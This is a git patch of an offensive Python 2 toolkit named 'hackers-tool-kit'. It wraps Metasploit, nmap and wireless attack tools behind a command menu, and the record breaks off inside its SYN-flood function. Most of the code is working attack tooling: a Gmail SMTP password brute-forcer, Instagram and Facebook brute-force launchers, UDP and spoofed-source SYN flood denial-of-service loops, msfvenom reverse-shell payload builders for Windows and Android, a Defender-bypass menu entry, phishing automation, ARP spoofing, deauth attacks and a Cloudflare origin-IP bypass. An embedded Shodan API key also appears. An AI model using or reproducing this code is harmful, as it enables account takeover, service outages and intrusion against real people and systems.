-rf winbyp.rc') -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -def upgrade(): - os.system("apt update && apt upgrade") -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -def terminal(): - os.system("gnome-terminal") -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - if x == "terminal": - terminal() - found = True -mainbanner() -main() From f898048ce9f10cde7e26c6ae01cc0269f6f6d18b Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 25 Mar 2019 16:28:09 -0400 Subject: [PATCH 072/214] Add files via upload --- htk.py | 2041 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2041 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..88b69a3 --- /dev/null +++ b/htk.py @@ -0,0 +1,2041 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +def mainbanner(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +\033[91m---------------------------------------------------------------------------------\033[0m + """ +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +def wifite(): + os.system("wifite") +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def netdev(): + os.system("netdiscover") +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + 